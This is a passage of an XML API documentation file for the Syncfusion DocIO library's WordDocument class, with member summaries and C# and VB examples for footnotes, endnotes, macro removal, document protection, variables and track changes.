        <member name="M:Syncfusion.DocIO.DLS.WordDocument.ReadXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentReader"/> object.</param>
            <returns>The value indicating the presence of xml content.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CreateLayoutInfo">
            <summary>
            Creates and initializes layout data
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.RemoveMacros">
            <summary>
            Removes the macros in the document.
            </summary>
            <example>
            <para>The following code example demonstrates how to remove macros from the Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the document with macros
                WordDocument document = new WordDocument("Sample.docm");
                //Check whether the document has macros and remove them
                if (document.HasMacros)
                    document.RemoveMacros();
                //Save the document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the document with macros
                Dim document As New WordDocument("Sample.docm")
                'Check whether the document has macros and remove them
                If document.HasMacros Then
                    document.RemoveMacros()
                End If
                'Save the document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SetTriggerElement(System.Int32@,System.Int32)">
            <summary>
            Sets the trigger element.
            </summary>
            <param name="flag">The flag.</param>
            <param name="bitPosition">The bit position.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.HasElement(System.Int32,System.Int32)">
            <summary>
            Determines whether the specified flag has element.
            </summary>
            <param name="flag">The flag.</param>
            <param name="bitPosition">The bit position.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.GetEncoding(System.String)">
            <summary>
            Get encoding for the specific code page
            </summary>
            <param name="codePageName">The code page name</param>
            <returns>Returns the derived encoding for Windows Phone and Xamarin</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.ChartToImageConverter">
            <summary>
            Gets or sets the <see cref="T:Syncfusion.OfficeChart.IOfficeChartToImageConverter"/> object for converting chart to image
            </summary>
            <remarks>
            <para>In Word to PDF conversion, to preserve the charts as images in the generated PDF document, this <see cref="P:Syncfusion.DocIO.DLS.WordDocument.ChartToImageConverter"/> must be initialized. Otherwise the charts will not be exported to the converted PDF</para>
            <para>ChartToImageConverter is supported from .NET Framework 4.0 onwards.</para>
            </remarks>
            <example>
            <para>The following code example demonstrates how to initialize the <see cref="P:Syncfusion.DocIO.DLS.WordDocument.ChartToImageConverter"/> to preserve the charts as images in the generated PDF document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument wordDocument = new WordDocument("Template.docx", FormatType.Docx);
                //Initialize ChartToImageConverter for converting charts during Word to pdf conversion
                wordDocument.ChartToImageConverter = new ChartToImageConverter();
                //Create an instance of DocToPDFConverter
                DocToPDFConverter converter = new DocToPDFConverter();
                //Convert Word document into PDF document
                PdfDocument pdfDocument = converter.ConvertToPDF(wordDocument);
                //Save the PDF file 
                pdfDocument.Save("WordtoPDF.pdf");
                //Close the instance of document objects
                pdfDocument.Close(true);
                wordDocument.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim wordDocument As New WordDocument("Template.docx", FormatType.Docx)
                'Initialize ChartToImageConverter for converting charts during Word to pdf conversion
                        ///     wordDocument.ChartToImageConverter = New ChartToImageConverter()
                'Create an instance of DocToPDFConverter
                Dim converter As New DocToPDFConverter()
                'Convert Word document into PDF document
                Dim pdfDocument As PdfDocument = converter.ConvertToPDF(wordDocument)
                'Save the PDF file 
                pdfDocument.Save("WordtoPDF.pdf")
                'Close the instance of document objects
                pdfDocument.Close(True)
                wordDocument.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.Footnotes">
            <summary>
            Gets or sets the footnote separators of the document.
            </summary>
            <value>The <seealso cref="T:Syncfusion.DocIO.DLS.Footnote"/> instance used to specify the footnote separator of this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</value>
            <seealso cref="T:Syncfusion.DocIO.DLS.Footnote"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.Endnotes">
            <summary>
            Gets or sets the endnote separators of the document.
            </summary>
            <value>The <seealso cref="T:Syncfusion.DocIO.DLS.Endnote"/> instance used to specify the endnote separator of this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</value>
            <seealso cref="T:Syncfusion.DocIO.DLS.Endnote"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.DefaultTabWidth">
            <summary>
            Gets or sets the default tab stop position value measured in points.
            </summary>
            <value>The width of the default tab.</value>
            <seealso cref="T:Syncfusion.DocIO.DLS.Tab"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.FIBVersion">
            <summary>
            Gets or sets the word version based on the nFib and nFibNew.
            Value of nFib    Word version
            0x00C0           97 create new document in OS
            0x00C1           97
            0x00C2           97 BIDI build
            0x00D9           2000
            0x0101           2002
            0x010C           2003
            0x0112           2007
            </summary>
            <value>The FIB version.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.BuiltinDocumentProperties">
            <summary>
            Gets a <see cref="T:Syncfusion.DocIO.DLS.BuiltinDocumentProperties"/> collection that represents all the built-in document properties for the specified document. Read-only.
            </summary>
            <seealso cref="P:Syncfusion.DocIO.DLS.WordDocument.BuiltinDocumentProperties"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.SummaryDocumentProperties"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.AttachedTemplate">
             <summary>
            Gets a <see cref="T:Syncfusion.DocIO.DLS.Template"/> object that represents the attached template of the document. Read-only.
             </summary>
             <value>Attached template of the document</value>
             <seealso cref="T:Syncfusion.DocIO.DLS.Template"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.UpdateStylesOnOpen">
            <summary>
            Gets or sets a value indicating whether to automatically update styles of the document from the attached template each time the document is opened. Default value is <b>false</b>.
            </summary>
            <value><b>True</b> if the styles of the document are updated to from the attached template;otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.CustomDocumentProperties">
            <summary>
            Gets a <see cref="T:Syncfusion.DocIO.DLS.CustomDocumentProperties"/> collection that represents all the custom document properties for the specified document. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.Sections">
            <summary>
            Gets a <see cref="T:Syncfusion.DocIO.DLS.WSectionCollection"/> collection that represents all the sections in the document. Read-only.
            </summary>
            <value> A <c>Sections</c> collection represents all the <see cref="T:Syncfusion.DocIO.DLS.WSection"/> in this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/></value>
            <seealso cref="T:Syncfusion.DocIO.DLS.WSectionCollection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.WSection"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.Styles">
            <summary>
            Gets a <see cref="T:Syncfusion.DocIO.DLS.IStyleCollection"/> collection that represents all the styles in the document. Read-only.
            </summary>
            <value>A <see cref="T:Syncfusion.DocIO.DLS.IStyleCollection"/> collection represents all the <see cref="T:Syncfusion.DocIO.DLS.IStyle"/> in this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/></value>
            <seealso cref="T:Syncfusion.DocIO.DLS.IStyleCollection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.StyleCollection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.IStyle"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.Style"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.ListStyles">
            <summary>
            Gets a <see cref="T:Syncfusion.DocIO.DLS.ListStyleCollection"/> collection that represents all the list styles in the document. Read-only.
            </summary>
            <value>All the <see cref="T:Syncfusion.DocIO.DLS.ListStyle"/> in this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</value>
            <seealso cref="T:Syncfusion.DocIO.DLS.ListStyleCollection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.ListStyle"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.Bookmarks">
            <summary>
            Gets a <see cref="T:Syncfusion.DocIO.DLS.BookmarkCollection"/> collection that represents all the bookmarks in the document. Read-only.
            </summary>
            <seealso cref="T:Syncfusion.DocIO.DLS.BookmarkCollection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.Bookmark"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.BookmarkStart"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.BookmarkEnd"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.Comments">
            <summary>
            Gets a <see cref="T:Syncfusion.DocIO.DLS.CommentsCollection"/> collection that represents all the comments in the document. Read-only.
            </summary>
            <seealso cref="T:Syncfusion.DocIO.DLS.CommentsCollection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.WComment"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.TextBoxes">
            <summary>
            Gets a <see cref="T:Syncfusion.DocIO.DLS.TextBoxCollection"/> collection that represents all the textboxes in the document. Read-only.
            </summary>
            <value>A <see cref="T:Syncfusion.DocIO.DLS.TextBoxCollection"/> collection represents all the <see cref="T:Syncfusion.DocIO.DLS.WTextBox"/> in this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</value>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextBoxCollection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.WTextBox"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.LastSection">
            <summary>
            Gets the last <see cref="T:Syncfusion.DocIO.DLS.WSection"/> of the document. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WSection"/> represents the last section of this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/></value>
            <example>
            <para>The following code example demonstrates how to retrieve the last section of the document</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance 
                WordDocument document = new WordDocument("Template.docx");
                //Retrieve the last section of the document and add new paragraph
                document.LastSection.AddParagraph().AppendText("Adding new paragraph to the document");
                //Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Template.docx")
                'Retrieve the last section of the document and add new paragraph
                document.LastSection.AddParagraph().AppendText("Adding new paragraph to the document")
                'Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.WSection"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.LastParagraph">
            <summary>
            Gets the last <see cref="T:Syncfusion.DocIO.DLS.WParagraph"/> of the document. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WParagraph"/> represents the last paragraph of this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/></value>
            <example>
            <para>The following code example demonstrates how to retrieve the last paragraph of the document</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance 
                WordDocument document = new WordDocument("Template.docx");
                //Set the last paragraph back color as Blue
                document.LastParagraph.ParagraphFormat.BackColor = Color.Blue;
                //Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Template.docx")
                'Set the last paragraph back color as Blue
                document.LastParagraph.ParagraphFormat.BackColor = Color.Blue
                'Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.WParagraph"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.EndnoteNumberFormat">
            <summary>
            Gets or sets the numbering format for the endnotes in the document.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.FootEndNoteNumberFormat"/> for the endnotes in the Word document</value>
            <example>
            <para>The following code example demonstrates how to specify the endnote number format in Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Set the endnote format
                document.EndnoteNumberFormat = FootEndNoteNumberFormat.Arabic;
                //Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Template.docx")
                'Set the endnote format
                document.EndnoteNumberFormat = FootEndNoteNumberFormat.Arabic
                'Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.FootnoteNumberFormat">
            <summary>
            Gets or sets the numbering format for the footnotes in the document.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.FootEndNoteNumberFormat"/> for the footnotes in the Word document</value>
            <example>
            <para>The following code example demonstrates how to specify the footnote number format in Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Set the footnote number format
                document.FootnoteNumberFormat = FootEndNoteNumberFormat.UpperCaseRoman;
                //Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Template.docx")
                'Set the footnote number format
                document.FootnoteNumberFormat = FootEndNoteNumberFormat.UpperCaseRoman
                'Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.RestartIndexForEndnote">
            <summary>
            Gets or sets the restart index for the endnotes in the document.
            </summary>
            <example>
            <para>The following code example demonstrates how to specify the endnote restart index number in Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Set the endnote restart index number
                document.RestartIndexForEndnote = EndnoteRestartIndex.RestartForEachSection;
                //Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Template.docx")
                'Set the endnote restart index number
                document.RestartIndexForEndnote = EndnoteRestartIndex.RestartForEachSection
                'Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.EndnotePosition">
            <summary>
            Gets or sets endnotes position in the document.
            </summary>
            <value>The <see cref="P:Syncfusion.DocIO.DLS.WordDocument.EndnotePosition"/> for the endnotes in the document</value>
            <example>
            <para>The following code example demonstrates how to specify the endnote position in Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Set the endnote position at end of each section
                document.EndnotePosition = EndnotePosition.DisplayEndOfSection;
                //Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Template.docx")
                'Set the endnote position at end of each section
                document.EndnotePosition = EndnotePosition.DisplayEndOfSection
                'Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.RestartIndexForFootnotes">
            <summary>
            Gets or sets the restart index for the footnotes in the document.
            </summary>
            <example>
            <para>The following code example demonstrates how to specify the footnote restart index number in Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Set the footnote restart index number
                document.RestartIndexForFootnotes = FootnoteRestartIndex.RestartForEachPage;
                //Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Template.docx")
                'Set the footnote restart index number
                document.RestartIndexForFootnotes = FootnoteRestartIndex.RestartForEachPage
                'Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.FootnotePosition">
            <summary>
            Gets or sets footnotes position in the document.
            </summary>
            <value>The <see cref="P:Syncfusion.DocIO.DLS.WordDocument.FootnotePosition"/> for the footnote in the document</value>
            <example>
            <para>The following code example demonstrates how to specify the footnote position in Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance  
                WordDocument document = new WordDocument("Template.docx");
                //Set the footnote position at immediately beneath text
                document.FootnotePosition = FootnotePosition.PrintImmediatelyBeneathText;
                //Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Template.docx")
                'Set the footnote position at immediately beneath text
                document.FootnotePosition = FootnotePosition.PrintImmediatelyBeneathText
                'Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.Watermark">
            <summary>
            Gets or sets a watermark for the document.
            </summary>
            <value>A text/picture that appears behind the document</value>
            <seealso cref="P:Syncfusion.DocIO.DLS.WordDocument.Watermark"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextWatermark"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.PictureWatermark"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.Background">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.Background"/> object that represents the background effects of the document. Read-only.
            </summary>
            <value>The background effects of the document</value>
            <seealso cref="P:Syncfusion.DocIO.DLS.WordDocument.Background"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.MailMerge">
            <summary>
            Gets a <see cref="T:Syncfusion.DocIO.DLS.MailMerge"/> object that represents the mail merge functionality of the document. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.MailMerge"/> instance used to replace the <see cref="T:Syncfusion.DocIO.DLS.WMergeField"/> with value in the document</value>
            <seealso cref="T:Syncfusion.DocIO.DLS.MailMerge"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.WMergeField"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.ProtectionType">
            <summary>
            Gets or sets the document protection type.
            </summary>
            <value> The <see cref="P:Syncfusion.DocIO.DLS.WordDocument.ProtectionType"/> will prevent the document from unintentional editing.</value>
            <example>
            <para>The following code example demonstrates how to protect the changing of document content.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance 
                WordDocument document = new WordDocument("Template.docx");
                //protect the document from editing
                document.ProtectionType = Syncfusion.DocIO.ProtectionType.AllowOnlyReading;
                //Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Template.docx")
                'protect the document from editing
                document.ProtectionType = Syncfusion.DocIO.ProtectionType.AllowOnlyReading
                'Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.ViewSetup">
            <summary>
            Gets or sets the document view type.
            </summary>
            <value>A <see cref="P:Syncfusion.DocIO.DLS.WordDocument.ViewSetup"/> represents the display options of this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> in MS Word application</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.ThrowExceptionsForUnsupportedElements">
            <summary>
            Gets or sets a value indicating whether to throw exceptions for unsupported elements. The default is <b>false</b>.
            </summary>
            <value><b>True</b> then throw the exception for unsupported elements; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.InitialFootnoteNumber">
            <summary>
            Gets or sets the initial footnote number of the document.
            </summary>
            <example>
            <para>The following code example demonstrates how to specify the endnote number format in Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Set the footnote initial number
                document.InitialFootnoteNumber = 3;
                //Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Template.docx")
                'Set the footnote initial number
                document.InitialFootnoteNumber = 3
                'Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.InitialEndnoteNumber">
            <summary>
            Gets or sets the initial endnote number of the document.
            </summary>
            <example>
            <para>The following code example demonstrates how to specify the endnote initial number in Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Set the endnote initial number
                document.InitialEndnoteNumber = 5;
                //Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Template.docx")
                'Set the endnote initial number
                document.InitialEndnoteNumber = 5
                'Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.ChildEntities">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.EntityCollection"/> collection that represents the child entities of this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>. Read-only.
            </summary>
            <value>The child entities.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.XHTMLValidateOption">
            <summary>
            Gets or sets the HTML validate option.
            </summary>
            <remarks>
            Currently, it is not supported in Silverlight, Universal, Windows Phone and Xamarin application.
            </remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.BackgroundImage">
            <summary>
            Gets or sets the background image of a document.
            </summary>
            <seealso cref="P:Syncfusion.DocIO.DLS.WordDocument.Background"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.Variables">
            <summary>
            Gets a <see cref="T:Syncfusion.DocIO.DLS.DocVariables"/> collection that represents the variables stored in the document. Read-only.
            </summary>
            <value>
            Variables collection contains a Key-Value pair of variable name and its value
            </value>
            <example>
            <para>The following code snippet illustrate how to add a DocVariable field in Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument();
                IWSection section = document.AddSection();
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("First Name of the customer: ");
                //Add the DocVariable field with Variable name and its type
                paragraph.AppendField("FirstName", FieldType.FieldDocVariable);
                paragraph = section.AddParagraph();
                paragraph.AppendText("Last Name of the customer: ");
                //Add the DocVariable field with Variable name and its type
                paragraph.AppendField("LastName", FieldType.FieldDocVariable);
                //Add the value for variable in WordDocument.Variable collection
                document.Variables.Add("FirstName", "Jeff");
                document.Variables.Add("LastName", "Smith");
                //Update the document fields
                document.UpdateDocumentFields();
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument()
                Dim section As IWSection = document.AddSection()
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("First Name of the customer: ")
                'Add the DocVariable field with Variable name and its type
                paragraph.AppendField("FirstName", FieldType.FieldDocVariable)
                paragraph = section.AddParagraph()
                paragraph.AppendText("Last Name of the customer: ")
                'Add the DocVariable field with Variable name and its type
                paragraph.AppendField("LastName", FieldType.FieldDocVariable)
                'Add the value for variable in WordDocument.Variable collection
                document.Variables.Add("FirstName", "Jeff")
                document.Variables.Add("LastName", "Smith")
                'Update the document fields
                document.UpdateDocumentFields()
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.Properties">
            <summary>
            Gets the document properties. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.DocProperties"/> instance used to specify the document version, form field shading and hyphenation properties of the document</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.HasChanges">
            <summary>
            Gets a value indicating whether the document has tracked changes. Read-only.
            </summary>
            <value>
            <b>True</b> if the document has tracked changes; otherwise, <b>false</b>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.TrackChanges">
            <summary>
            Gets or sets a value indicating whether edits are tracked as revision. The default is <b>false</b>.
            </summary>
            <value><b>True</b> if track changes in on; otherwise, <b>false</b>.</value>
            <example>
            <para>The following code snippet shows how to track the edits as revisions in the document</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance 
                WordDocument document = new WordDocument("Template.docx");
                //Enable the TrackChanges to track the edits as revision  
                document.TrackChanges = true;
                //Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Template.docx")
                'Enable the TrackChanges to track the edits as revision  
                document.TrackChanges = True
                'Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.ReplaceFirst">
            <summary>
            Gets or sets a value indicating whether replace only the first occurrence. The default is <b>false</b>.
            </summary>
            <value><b>True</b> replace only the first occurrence in the document; <b>false</b> replace all the occurrence.</value>
            <example>
            <para>The following code snippet illustrates how to replace the first occurrence of a particular text.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Set to replace only the first occurrence of a particular text
                document.ReplaceFirst = true;
                //Find the first occurrence of a particular text in the document
                TextSelection selection = document.Find("contents", false, false);
                //Initialize text body part
                TextBodyPart bodyPart = new TextBodyPart(selection);
                //Replace a particular text with the text body part
                document.Replace("paragraph", bodyPart, false, true, true);
                //Save and close the document
                document.Save("Replace.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Set to replace only the first occurrence of a particular text
                document.ReplaceFirst = True
                'Find the first occurrence of a particular text in the document
                Dim selection As TextSelection = document.Find("contents", False, False)
                'Initialize text body part
                Dim bodyPart As New TextBodyPart(selection)
                'Replace a particular text with the text body part
                document.Replace("paragraph", bodyPart, False, True, True)
                'Save and close the document
                document.Save("Replace.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocument.HTMLImportSettings">
            <summary>
            Gets or sets the HTML import settings for HTML to Word conversion.
            </summary>
